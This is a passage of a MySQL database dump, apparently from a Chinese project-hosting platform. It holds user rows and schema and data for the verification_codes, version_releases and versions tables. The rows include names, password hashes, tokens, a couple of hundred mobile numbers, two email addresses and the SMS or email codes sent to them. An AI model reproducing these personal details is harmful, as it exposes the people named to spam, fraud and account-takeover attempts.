05:32:24','User',NULL,'only_my_events','28a19f254ffb873edcd73c5339d5376c',NULL,0,0,0,'15150594389',0,0,0,'张弛',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','2c6bfb7ada8a6a3472c7a1040d168ccc35d3947f',215,0,1,0,1,0,0),(220,'p53014726','9b4a957368e81d6339c6ee979b8e16a0e33b3367','','','p53014726@example.org',0,1,'2021-03-13 11:53:20','',NULL,'2021-03-13 11:50:02','2021-03-13 11:50:31','User',NULL,'only_my_events','3e402e472c9b72af81918ec0ab5fa043',NULL,0,0,0,'13051359791',0,0,0,'浪书生',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','7e41ed9acdadbd2647bdffc878a92358aebd1709',216,0,1,0,1,0,0),(221,'p45203617','06b7f9d23ab108db7a94d6e61ccb6ee05ada92ff','','','p45203617@example.org',0,1,'2021-03-13 14:49:07','',NULL,'2021-03-13 14:46:34','2021-03-13 06:49:03','User',NULL,'only_my_events','acb430d6ecc720ec57ff8d3d8693f855',NULL,0,0,0,'18081230160',0,0,0,'haha',1,0,NULL,0,0,0,0,0,0,0,NULL,'military','9db2fe5d2eb1518d7f6096cacacd45566ec2e62a',217,0,1,0,0,0,0);
|
||
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `users_authentications`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `users_authentications`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `users_authentications` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`authentication_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `users_authentications`
|
||
--
|
||
|
||
LOCK TABLES `users_authentications` WRITE;
|
||
/*!40000 ALTER TABLE `users_authentications` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `users_authentications` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `verification_codes`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `verification_codes`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `verification_codes` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`code` varchar(255) DEFAULT NULL,
|
||
`code_type` int(11) DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`phone` varchar(255) DEFAULT NULL,
|
||
`email` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=240 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `verification_codes`
|
||
--
|
||
|
||
LOCK TABLES `verification_codes` WRITE;
|
||
/*!40000 ALTER TABLE `verification_codes` DISABLE KEYS */;
|
||
INSERT INTO `verification_codes` VALUES (1,'160759',4,1,'15388083362',NULL,'2018-07-06 09:21:09','2018-07-06 09:21:09'),(2,'126058',1,1,'15773138233',NULL,'2018-07-06 10:52:06','2018-07-06 10:52:06'),(3,'587123',1,1,'13548953938',NULL,'2018-07-08 10:28:06','2018-07-08 10:28:06'),(4,'725694',4,1,'13548953938',NULL,'2018-07-08 14:50:51','2018-07-08 14:50:51'),(5,'395741',1,1,'13548953938',NULL,'2018-07-20 09:16:29','2018-07-20 09:16:29'),(6,'208671',1,1,'15388083362',NULL,'2018-07-20 14:47:28','2018-07-20 14:47:28'),(7,'132708',1,1,'17375771263',NULL,'2018-07-30 09:38:54','2018-07-30 09:38:54'),(8,'583124',1,1,'18173242757',NULL,'2018-08-03 19:28:02','2018-08-03 19:28:02'),(9,'837910',6,1,'18173242757',NULL,'2018-08-03 19:29:56','2018-08-03 19:29:56'),(10,'486072',1,1,'13261628376',NULL,'2018-08-06 15:18:22','2018-08-06 15:18:22'),(11,'518463',1,1,'18670725296',NULL,'2018-08-06 15:24:44','2018-08-06 15:24:44'),(12,'018526',1,1,'15308497760',NULL,'2018-08-21 17:13:15','2018-08-21 17:13:15'),(13,'974803',1,1,'13319550228',NULL,'2018-08-22 15:58:33','2018-08-22 15:58:33'),(14,'495618',1,1,'18688920216',NULL,'2018-08-30 22:27:55','2018-08-30 22:27:55'),(15,'159470',1,1,'13302939135',NULL,'2018-09-05 13:54:24','2018-09-05 13:54:24'),(16,'172364',1,1,'13910272339',NULL,'2018-09-07 12:36:09','2018-09-07 12:36:09'),(17,'931842',1,1,'18230526151',NULL,'2018-10-10 09:29:06','2018-10-10 09:29:06'),(18,'821493',1,1,'18614295863',NULL,'2018-10-12 17:36:30','2018-10-12 17:36:30'),(19,'986310',2,1,'18614295863',NULL,'2018-11-08 17:50:09','2018-11-08 17:50:09'),(20,'392165',2,1,'13910272339',NULL,'2018-11-13 09:03:57','2018-11-13 09:03:57'),(21,'417926',4,1,'13261628376',NULL,'2018-11-14 15:37:41','2018-11-14 15:37:41'),(22,'236578',1,1,'18098901829',NULL,'2018-12-19 09:06:03','2018-12-19 09:06:03'),(23,'539124',1,1,'13548953938',NULL,'2019-01-15 09:36:37','2019-01-15 09:36:37'),(24,'683795',1,1,'15610376287',NULL,'2019-01-18 09:54:07','2019-01-18 09:54:07'),(25,'902643',1,1,'18253422098',NULL,'2019-03-21 21:28:24','2019-03-21 21:28:24'),(26,'284160',1,1,'18569415107',NULL,'2019-04-09 15:27:24','2019-04-09 15:27:24'),(27,'058461',7,1,NULL,'cas5144@163.com','2019-04-17 09:38:12','2019-04-17 09:38:12'),(28,'564837',7,1,NULL,'cas5144@163.com','2019-04-17 09:41:33','2019-04-17 09:41:33'),(29,'918347',1,1,'15717412992',NULL,'2019-04-17 09:47:59','2019-04-17 09:47:59'),(30,'541328',1,1,'15717412992',NULL,'2019-04-17 09:49:15','2019-04-17 09:49:15'),(31,'678421',1,1,'13875934142',NULL,'2019-04-18 11:05:59','2019-04-18 11:05:59'),(32,'876912',1,1,'18092380139',NULL,'2019-06-09 11:30:42','2019-06-09 11:30:42'),(33,'738412',1,1,'18684812012',NULL,'2019-08-05 13:57:11','2019-08-05 13:57:11'),(34,'123749',1,1,'18684812012',NULL,'2019-08-05 17:29:03','2019-08-05 17:29:03'),(35,'152798',1,1,'18911166797',NULL,'2019-08-06 08:33:16','2019-08-06 08:33:16'),(36,'917402',1,1,'13986179525',NULL,'2019-08-06 09:09:48','2019-08-06 09:09:48'),(37,'491075',1,1,'18684812012',NULL,'2019-08-06 09:24:25','2019-08-06 09:24:25'),(38,'347860',1,1,'15633333333',NULL,'2019-08-07 09:23:41','2019-08-07 09:23:41'),(39,'130862',1,1,'15633333333',NULL,'2019-08-07 09:32:26','2019-08-07 09:32:26'),(40,'222333',1,1,'15633333333',NULL,'2019-08-07 09:32:58','2019-08-07 09:32:58'),(41,'032468',1,1,'15644444444',NULL,'2019-08-07 09:36:57','2019-08-07 09:36:57'),(42,'222333',1,1,'15644444444',NULL,'2019-08-07 09:37:02','2019-08-07 09:37:02'),(43,'024587',1,1,'15110092740',NULL,'2019-08-07 14:52:24','2019-08-07 14:52:24'),(44,'372958',1,1,'13667364915',NULL,'2019-08-07 15:44:20','2019-08-07 15:44:20'),(45,'518762',1,1,'13621213829',NULL,'2019-08-13 09:25:49','2019-08-13 09:25:49'),(46,'809127',1,1,'13621213829',NULL,'2019-08-13 09:29:29','2019-08-13 09:29:29'),(47,'697328',2,1,'15610376287',NULL,'2019-08-13 10:17:27','2019-08-13 10:17:27'),(48,'890342',1,1,'13666666666',NULL,'2019-08-14 16:49:25','2019-08-14 16:49:25'),(49,'786987',2,1,'13666666666',NULL,'2019-08-15 15:16:52','2019-08-15 15:16:52'),(50,'739805',1,1,'13975850702',NULL,'2019-08-17 08:59:23','2019-08-17 08:59:23'),(51,'056219',1,1,'13975810032',NULL,'2019-09-16 09:59:09','2019-09-16 09:59:09'),(52,'079562',1,1,'15521145261',NULL,'2019-10-10 16:47:49','2019-10-10 16:47:49'),(53,'764513',1,1,'13455555555',NULL,'2019-10-19 09:24:06','2019-10-19 09:24:06'),(54,'371984',1,1,'15610376287',NULL,'2019-10-23 09:31:45','2019-10-23 09:31:45'),(55,'312540',2,1,'18253422098',NULL,'2019-10-28 15:04:33','2019-10-28 15:04:33'),(56,'705128',2,1,'18253422098',NULL,'2019-10-28 15:06:28','2019-10-28 15:06:28'),(57,'314075',1,1,'15914025169',NULL,'2019-10-29 10:00:10','2019-10-29 10:00:10'),(58,'521869',3,1,NULL,'limj_9803@163.com','2019-10-29 12:58:54','2019-10-29 12:58:54'),(59,'258947',3,1,NULL,'limj_9803@163.com','2019-10-29 13:00:17','2019-10-29 13:00:17'),(60,'504923',3,1,NULL,'limj_9803@163.com','2019-10-29 13:01:35','2019-10-29 13:01:35'),(61,'983702',1,1,'13987655674',NULL,'2019-10-29 17:07:16','2019-10-29 17:07:16'),(62,'590734',1,1,'13977654433',NULL,'2019-10-29 17:08:14','2019-10-29 17:08:14'),(63,'821065',1,1,'15610386287',NULL,'2019-11-24 21:47:50','2019-11-24 21:47:50'),(64,'024173',1,1,'15610376287',NULL,'2019-11-24 21:48:23','2019-11-24 21:48:23'),(65,'290843',1,1,'15644443333',NULL,'2019-11-25 11:20:29','2019-11-25 11:20:29'),(66,'394287',1,1,'15610376287',NULL,'2019-11-25 11:25:12','2019-11-25 11:25:12'),(67,'461837',1,1,'15802569718',NULL,'2020-02-01 12:44:21','2020-02-01 12:44:21'),(68,'062731',1,1,'18507497207',NULL,'2020-02-01 18:52:13','2020-02-01 18:52:13'),(69,'352190',1,1,'18518278000',NULL,'2020-02-01 20:34:29','2020-02-01 20:34:29'),(70,'519320',1,1,'15116306060',NULL,'2020-02-01 22:26:19','2020-02-01 22:26:19'),(71,'193578',1,1,'13467663113',NULL,'2020-02-03 17:17:44','2020-02-03 17:17:44'),(72,'982014',1,1,'18622002052',NULL,'2020-02-04 21:54:05','2020-02-04 21:54:05'),(73,'648520',1,1,'18622002052',NULL,'2020-02-04 21:59:57','2020-02-04 21:59:57'),(74,'368547',1,1,'13027499606',NULL,'2020-02-04 22:08:38','2020-02-04 22:08:38'),(75,'092134',1,1,'15501098181',NULL,'2020-02-05 10:29:03','2020-02-05 10:29:03'),(76,'936150',1,1,'18511180568',NULL,'2020-02-05 10:30:28','2020-02-05 10:30:28'),(77,'169287',1,1,'13203112880',NULL,'2020-02-05 10:31:35','2020-02-05 10:31:35'),(78,'825710',1,1,'18202282605',NULL,'2020-02-05 10:32:21','2020-02-05 10:32:21'),(79,'349501',1,1,'13811892035',NULL,'2020-02-05 10:34:51','2020-02-05 10:34:51'),(80,'096548',1,1,'18600420625',NULL,'2020-02-05 10:37:38','2020-02-05 10:37:38'),(81,'294761',1,1,'17610686329',NULL,'2020-02-05 10:39:43','2020-02-05 10:39:43'),(82,'504632',1,1,'15120019070',NULL,'2020-02-05 10:42:38','2020-02-05 10:42:38'),(83,'805493',1,1,'18622381990',NULL,'2020-02-05 10:54:29','2020-02-05 10:54:29'),(84,'694385',1,1,'15101005652',NULL,'2020-02-05 10:54:30','2020-02-05 10:54:30'),(85,'974861',1,1,'18801183281',NULL,'2020-02-05 10:54:46','2020-02-05 10:54:46'),(86,'483719',1,1,'18631324553',NULL,'2020-02-05 10:55:41','2020-02-05 10:55:41'),(87,'049175',1,1,'13754018045',NULL,'2020-02-05 10:57:22','2020-02-05 10:57:22'),(88,'270358',1,1,'18622018199',NULL,'2020-02-05 11:02:16','2020-02-05 11:02:16'),(89,'089273',1,1,'18801131203',NULL,'2020-02-05 11:04:46','2020-02-05 11:04:46'),(90,'316409',1,1,'15210950985',NULL,'2020-02-05 11:22:13','2020-02-05 11:22:13'),(91,'964523',1,1,'15210950985',NULL,'2020-02-05 11:24:40','2020-02-05 11:24:40'),(92,'239478',1,1,'13311597603',NULL,'2020-02-05 11:40:42','2020-02-05 11:40:42'),(93,'512094',1,1,'18510060779',NULL,'2020-02-05 12:24:14','2020-02-05 12:24:14'),(94,'641390',1,1,'13261801298',NULL,'2020-02-05 14:47:26','2020-02-05 14:47:26'),(95,'408312',1,1,'18902052695',NULL,'2020-02-05 14:52:16','2020-02-05 14:52:16'),(96,'261584',1,1,'13920725587',NULL,'2020-02-05 15:22:16','2020-02-05 15:22:16'),(97,'769081',1,1,'17602666192',NULL,'2020-02-05 16:25:16','2020-02-05 16:25:16'),(98,'648392',2,1,'15210950985',NULL,'2020-02-10 09:09:47','2020-02-10 09:09:47'),(99,'842136',2,1,'15116306060',NULL,'2020-02-10 10:07:06','2020-02-10 10:07:06'),(100,'190284',1,1,'18518279000',NULL,'2020-02-10 12:21:17','2020-02-10 12:21:17'),(101,'954081',2,1,'13027499606',NULL,'2020-02-11 09:59:43','2020-02-11 09:59:43'),(102,'973402',2,1,'18510060779',NULL,'2020-02-11 20:54:58','2020-02-11 20:54:58'),(103,'725360',2,1,'13027499606',NULL,'2020-02-24 17:44:16','2020-02-24 17:44:16'),(104,'584310',1,1,'18304010619',NULL,'2020-03-19 13:54:20','2020-03-19 13:54:20'),(105,'052367',1,1,'13683058106',NULL,'2020-03-19 15:08:34','2020-03-19 15:08:34'),(106,'471532',1,1,'18202668721',NULL,'2020-03-19 15:08:44','2020-03-19 15:08:44'),(107,'421756',1,1,'18526596159',NULL,'2020-03-19 15:09:27','2020-03-19 15:09:27'),(108,'482670',1,1,'18522782272',NULL,'2020-03-19 15:12:37','2020-03-19 15:12:37'),(109,'619540',1,1,'17883691760',NULL,'2020-03-19 15:12:49','2020-03-19 15:12:49'),(110,'905817',1,1,'15389083848',NULL,'2020-03-23 08:27:46','2020-03-23 08:27:46'),(111,'427109',1,1,'15711437221',NULL,'2020-07-03 11:50:50','2020-07-03 11:50:50'),(112,'849637',1,1,'15611527007',NULL,'2020-08-12 10:41:02','2020-08-12 10:41:02'),(113,'754680',1,1,'15910848375',NULL,'2020-08-14 08:58:29','2020-08-14 08:58:29'),(114,'820514',1,1,'13121886117',NULL,'2020-09-22 16:19:15','2020-09-22 16:19:15'),(115,'417920',1,1,'13121886117',NULL,'2020-09-22 16:20:18','2020-09-22 16:20:18'),(116,'320479',1,1,'13121886117',NULL,'2020-09-22 16:21:30','2020-09-22 16:21:30'),(117,'175028',1,1,'15831313819',NULL,'2020-09-29 17:20:20','2020-09-29 17:20:20'),(118,'952037',1,1,'13629752655',NULL,'2020-10-21 16:47:26','2020-10-21 16:47:26'),(119,'867429',1,1,'13366881017',NULL,'2020-12-01 18:17:57','2020-12-01 18:17:57'),(120,'297146',1,1,'15201232803',NULL,'2020-12-02 13:18:10','2020-12-02 13:18:10'),(121,'218450',1,1,'18784037517',NULL,'2020-12-14 14:31:36','2020-12-14 14:31:36'),(122,'813204',1,1,'15881670886',NULL,'2020-12-16 16:06:15','2020-12-16 16:06:15'),(123,'345826',1,1,'18428364854',NULL,'2020-12-16 18:54:32','2020-12-16 18:54:32'),(124,'578621',1,1,'18945681236',NULL,'2020-12-17 10:02:27','2020-12-17 10:02:27'),(125,'753281',1,1,'18945681236',NULL,'2020-12-17 10:03:51','2020-12-17 10:03:51'),(126,'712483',1,1,'18684265369',NULL,'2020-12-17 11:17:51','2020-12-17 11:17:51'),(127,'198436',1,1,'18684236585',NULL,'2020-12-17 11:21:54','2020-12-17 11:21:54'),(128,'018549',1,1,'18792802459',NULL,'2020-12-18 18:53:11','2020-12-18 18:53:11'),(129,'730581',1,1,'13311567612',NULL,'2020-12-22 19:46:59','2020-12-22 19:46:59'),(130,'057928',2,1,'15201232803',NULL,'2020-12-24 12:14:15','2020-12-24 12:14:15'),(131,'317905',1,1,'15386415121',NULL,'2020-12-24 15:18:58','2020-12-24 15:18:58'),(132,'364751',1,1,'15311060679',NULL,'2020-12-27 11:42:35','2020-12-27 11:42:35'),(133,'296378',1,1,'18152617452',NULL,'2020-12-28 11:28:29','2020-12-28 11:28:29'),(134,'169240',1,1,'13811536538',NULL,'2020-12-29 11:32:29','2020-12-29 11:32:29'),(135,'891072',2,1,'13975850702',NULL,'2020-12-29 15:02:52','2020-12-29 15:02:52'),(136,'562487',1,1,'15581460403',NULL,'2020-12-29 15:12:12','2020-12-29 15:12:12'),(137,'592480',1,1,'18686867878',NULL,'2020-12-29 15:19:08','2020-12-29 15:19:08'),(138,'732018',1,1,'18686867878',NULL,'2020-12-29 15:20:21','2020-12-29 15:20:21'),(139,'842537',1,1,'18686867878',NULL,'2020-12-29 15:21:25','2020-12-29 15:21:25'),(140,'629417',1,1,'15243705227',NULL,'2020-12-29 15:22:33','2020-12-29 15:22:33'),(141,'072563',1,1,'15243705227',NULL,'2020-12-29 15:23:39','2020-12-29 15:23:39'),(142,'926341',1,1,'18670308298',NULL,'2020-12-30 10:05:08','2020-12-30 10:05:08'),(143,'859160',1,1,'13778060607',NULL,'2021-01-05 10:33:12','2021-01-05 10:33:12'),(144,'395806',1,1,'15583305542',NULL,'2021-01-05 18:41:31','2021-01-05 18:41:31'),(145,'290643',1,1,'15581460403',NULL,'2021-01-06 10:24:32','2021-01-06 10:24:32'),(146,'207983',1,1,'15581460403',NULL,'2021-01-06 10:25:25','2021-01-06 10:25:25'),(147,'831645',1,1,'15581460403',NULL,'2021-01-06 10:28:18','2021-01-06 10:28:18'),(148,'659027',1,1,'15386415521',NULL,'2021-01-06 10:52:38','2021-01-06 10:52:38'),(149,'075241',1,1,'15386415122',NULL,'2021-01-06 11:04:51','2021-01-06 11:04:51'),(150,'076952',1,1,'18878782367',NULL,'2021-01-06 11:12:03','2021-01-06 11:12:03'),(151,'235741',1,1,'18876252709',NULL,'2021-01-06 11:21:27','2021-01-06 11:21:27'),(152,'052843',1,1,'18726710923',NULL,'2021-01-06 11:29:00','2021-01-06 11:29:00'),(153,'487091',1,1,'18765340982',NULL,'2021-01-06 11:39:50','2021-01-06 11:39:50'),(154,'352704',1,1,'18723498083',NULL,'2021-01-06 11:46:09','2021-01-06 11:46:09'),(155,'140683',1,1,'18736789455',NULL,'2021-01-06 11:47:53','2021-01-06 11:47:53'),(156,'347680',1,1,'13456279890',NULL,'2021-01-06 14:02:17','2021-01-06 14:02:17'),(157,'513802',1,1,'13456257823',NULL,'2021-01-06 14:44:26','2021-01-06 14:44:26'),(158,'956817',1,1,'13456434526',NULL,'2021-01-06 14:55:40','2021-01-06 14:55:40'),(159,'635891',1,1,'17269676559',NULL,'2021-01-06 15:43:43','2021-01-06 15:43:43'),(160,'589241',1,1,'15386415125',NULL,'2021-01-06 15:49:19','2021-01-06 15:49:19'),(161,'427561',1,1,'15386415126',NULL,'2021-01-06 16:24:21','2021-01-06 16:24:21'),(162,'476598',1,1,'15681117001',NULL,'2021-01-07 15:21:47','2021-01-07 15:21:47'),(163,'931026',1,1,'18201527769',NULL,'2021-01-13 11:04:04','2021-01-13 11:04:04'),(164,'617298',2,1,'15311060679',NULL,'2021-01-18 11:57:36','2021-01-18 11:57:36'),(165,'529168',1,1,'18513853494',NULL,'2021-01-22 15:35:04','2021-01-22 15:35:04'),(166,'092643',1,1,'13696286255',NULL,'2021-01-26 09:19:44','2021-01-26 09:19:44'),(167,'327185',1,1,'13364041235',NULL,'2021-01-26 18:18:54','2021-01-26 18:18:54'),(168,'894365',1,1,'13364041235',NULL,'2021-01-26 18:19:57','2021-01-26 18:19:57'),(169,'589213',1,1,'19881671521',NULL,'2021-01-26 18:21:24','2021-01-26 18:21:24'),(170,'924685',2,1,'15201232803',NULL,'2021-01-27 22:20:07','2021-01-27 22:20:07'),(171,'389701',1,1,'18990163422',NULL,'2021-01-28 15:58:18','2021-01-28 15:58:18'),(172,'206954',1,1,'13364061235',NULL,'2021-01-28 18:25:05','2021-01-28 18:25:05'),(173,'549718',1,1,'15984411707',NULL,'2021-01-28 23:13:00','2021-01-28 23:13:00'),(174,'982706',2,1,'18513853494',NULL,'2021-01-29 11:39:07','2021-01-29 11:39:07'),(175,'708159',2,1,'13975850702',NULL,'2021-02-09 09:36:24','2021-02-09 09:36:24'),(176,'384256',2,1,'18990163422',NULL,'2021-02-20 09:23:18','2021-02-20 09:23:18'),(177,'078265',1,1,'15201175682',NULL,'2021-02-20 09:24:08','2021-02-20 09:24:08'),(178,'927816',1,1,'18374982164',NULL,'2021-02-20 09:25:27','2021-02-20 09:25:27'),(179,'561890',1,1,'15201175682',NULL,'2021-02-20 09:25:45','2021-02-20 09:25:45'),(180,'401526',1,1,'13021100577',NULL,'2021-02-20 09:31:45','2021-02-20 09:31:45'),(181,'285194',1,1,'15217650365',NULL,'2021-02-20 09:36:59','2021-02-20 09:36:59'),(182,'536429',1,1,'13945101841',NULL,'2021-02-20 09:43:23','2021-02-20 09:43:23'),(183,'109563',1,1,'13268059518',NULL,'2021-02-20 09:43:47','2021-02-20 09:43:47'),(184,'983576',1,1,'18281511058',NULL,'2021-02-20 09:47:54','2021-02-20 09:47:54'),(185,'684719',1,1,'15129061176',NULL,'2021-02-20 09:57:07','2021-02-20 09:57:07'),(186,'589761',1,1,'13551069527',NULL,'2021-02-20 10:13:24','2021-02-20 10:13:24'),(187,'458932',1,1,'18101246757',NULL,'2021-02-20 10:34:44','2021-02-20 10:34:44'),(188,'106293',1,1,'18362883083',NULL,'2021-02-20 10:41:36','2021-02-20 10:41:36'),(189,'913608',1,1,'13770609278',NULL,'2021-02-20 11:01:34','2021-02-20 11:01:34'),(190,'024316',1,1,'15353665625',NULL,'2021-02-20 13:25:46','2021-02-20 13:25:46'),(191,'304276',1,1,'15957177409',NULL,'2021-02-20 14:12:50','2021-02-20 14:12:50'),(192,'562174',1,1,'18642871537',NULL,'2021-02-20 14:22:01','2021-02-20 14:22:01'),(193,'486091',1,1,'15835724733',NULL,'2021-02-20 19:46:38','2021-02-20 19:46:38'),(194,'915684',1,1,'13379243667',NULL,'2021-02-21 14:02:02','2021-02-21 14:02:02'),(195,'628015',1,1,'15840501160',NULL,'2021-02-22 22:36:42','2021-02-22 22:36:42'),(196,'409813',1,1,'15109287698',NULL,'2021-02-24 14:52:26','2021-02-24 14:52:26'),(197,'461583',1,1,'13298789737',NULL,'2021-02-24 17:51:29','2021-02-24 17:51:29'),(198,'126095',1,1,'18716470818',NULL,'2021-02-25 08:41:28','2021-02-25 08:41:28'),(199,'456371',1,1,'13121886117',NULL,'2021-02-25 08:48:33','2021-02-25 08:48:33'),(200,'163589',1,1,'13141477642',NULL,'2021-02-25 14:00:38','2021-02-25 14:00:38'),(201,'617459',1,1,'15123102653',NULL,'2021-02-26 10:23:52','2021-02-26 10:23:52'),(202,'971502',1,1,'18390891589',NULL,'2021-02-26 20:15:16','2021-02-26 20:15:16'),(203,'581493',1,1,'15721957337',NULL,'2021-03-01 19:03:25','2021-03-01 19:03:25'),(204,'570863',1,1,'17354110096',NULL,'2021-03-01 22:06:53','2021-03-01 22:06:53'),(205,'743562',1,1,'15950585303',NULL,'2021-03-03 07:35:27','2021-03-03 07:35:27'),(206,'726891',1,1,'18530799619',NULL,'2021-03-04 10:12:09','2021-03-04 10:12:09'),(207,'948157',1,1,'18768134456',NULL,'2021-03-04 10:16:18','2021-03-04 10:16:18'),(208,'682713',1,1,'13335515203',NULL,'2021-03-04 10:16:59','2021-03-04 10:16:59'),(209,'263015',1,1,'18222965919',NULL,'2021-03-04 10:19:28','2021-03-04 10:19:28'),(210,'548219',1,1,'15850566518',NULL,'2021-03-04 10:19:38','2021-03-04 10:19:38'),(211,'928053',1,1,'18368090601',NULL,'2021-03-04 10:19:44','2021-03-04 10:19:44'),(212,'046579',1,1,'15850570076',NULL,'2021-03-04 10:27:05','2021-03-04 10:27:05'),(213,'395746',1,1,'13652081916',NULL,'2021-03-04 10:27:36','2021-03-04 10:27:36'),(214,'816390',1,1,'13126538485',NULL,'2021-03-04 10:29:14','2021-03-04 10:29:14'),(215,'639510',1,1,'13572150485',NULL,'2021-03-04 10:41:38','2021-03-04 10:41:38'),(216,'028194',4,1,'18143465227',NULL,'2021-03-04 10:46:14','2021-03-04 10:46:14'),(217,'621758',1,1,'18829238314',NULL,'2021-03-04 11:10:28','2021-03-04 11:10:28'),(218,'652174',1,1,'15386415131',NULL,'2021-03-05 10:32:32','2021-03-05 10:32:32'),(219,'762350',1,1,'15386415132',NULL,'2021-03-05 11:23:38','2021-03-05 11:23:38'),(220,'067235',1,1,'18946190778',NULL,'2021-03-05 13:12:09','2021-03-05 13:12:09'),(221,'036782',1,1,'15386415133',NULL,'2021-03-05 14:19:47','2021-03-05 14:19:47'),(222,'549360',1,1,'15386415134',NULL,'2021-03-05 14:37:53','2021-03-05 14:37:53'),(223,'631925',1,1,'15850687079',NULL,'2021-03-05 22:04:02','2021-03-05 22:04:02'),(224,'072948',1,1,'18813111529',NULL,'2021-03-06 17:19:04','2021-03-06 17:19:04'),(225,'543128',1,1,'18851655399',NULL,'2021-03-06 17:26:00','2021-03-06 17:26:00'),(226,'342956',1,1,'15852088802',NULL,'2021-03-06 18:04:14','2021-03-06 18:04:14'),(227,'980634',1,1,'13817567047',NULL,'2021-03-06 19:56:15','2021-03-06 19:56:15'),(228,'710869',1,1,'15821253655',NULL,'2021-03-07 23:20:41','2021-03-07 23:20:41'),(229,'875036',1,1,'15652776324',NULL,'2021-03-09 16:01:01','2021-03-09 16:01:01'),(230,'638759',1,1,'18284572692',NULL,'2021-03-09 16:19:52','2021-03-09 16:19:52'),(231,'401296',1,1,'18373137353',NULL,'2021-03-09 16:42:58','2021-03-09 16:42:58'),(232,'348105',1,1,'15810173698',NULL,'2021-03-09 21:48:49','2021-03-09 21:48:49'),(233,'143569',1,1,'13716758829',NULL,'2021-03-10 18:03:01','2021-03-10 18:03:01'),(234,'169482',1,1,'15876292980',NULL,'2021-03-11 07:01:53','2021-03-11 07:01:53'),(235,'416980',1,1,'15652926529',NULL,'2021-03-11 15:05:14','2021-03-11 15:05:14'),(236,'738524',2,1,'18670308298',NULL,'2021-03-12 09:46:52','2021-03-12 09:46:52'),(237,'650748',1,1,'15150594389',NULL,'2021-03-12 20:36:27','2021-03-12 20:36:27'),(238,'435279',1,1,'13051359791',NULL,'2021-03-13 11:49:43','2021-03-13 11:49:43'),(239,'098724',1,1,'18081230160',NULL,'2021-03-13 14:46:20','2021-03-13 14:46:20');
|
||
/*!40000 ALTER TABLE `verification_codes` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `version_releases`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `version_releases`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `version_releases` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`body` text,
|
||
`tag_name` varchar(255) DEFAULT NULL,
|
||
`target_commitish` varchar(255) DEFAULT NULL,
|
||
`draft` tinyint(1) DEFAULT '0',
|
||
`prerelease` tinyint(1) DEFAULT '0',
|
||
`tarball_url` varchar(255) DEFAULT NULL,
|
||
`zipball_url` varchar(255) DEFAULT NULL,
|
||
`url` varchar(255) DEFAULT NULL,
|
||
`version_gid` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`repository_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_version_releases_on_repository_id` (`repository_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `version_releases`
|
||
--
|
||
|
||
LOCK TABLES `version_releases` WRITE;
|
||
/*!40000 ALTER TABLE `version_releases` DISABLE KEYS */;
|
||
INSERT INTO `version_releases` VALUES (1,155,'发行版01','发行版01','发行版01','master',0,0,NULL,NULL,NULL,NULL,'2021-01-22 08:25:40','2021-01-22 08:25:40',531),(2,155,'v1.0.0',NULL,'v1.0.0','master',0,0,NULL,NULL,NULL,NULL,'2021-01-25 05:19:06','2021-01-25 05:19:06',532),(3,155,'v1.0.1','v1.0.1','v1.0.1','master',0,0,NULL,NULL,NULL,NULL,'2021-01-25 06:43:00','2021-01-25 06:43:00',532);
|
||
/*!40000 ALTER TABLE `version_releases` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `versions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `versions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `versions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
`name` varchar(255) NOT NULL DEFAULT '',
|
||
`description` text,
|
||
`effective_date` date DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
`wiki_page_title` varchar(255) DEFAULT NULL,
|
||
`status` varchar(255) DEFAULT 'open',
|
||
`sharing` varchar(255) NOT NULL DEFAULT 'none',
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`issues_count` int(11) DEFAULT '0',
|
||
`closed_issues_count` int(11) DEFAULT '0',
|
||
`percent` float DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
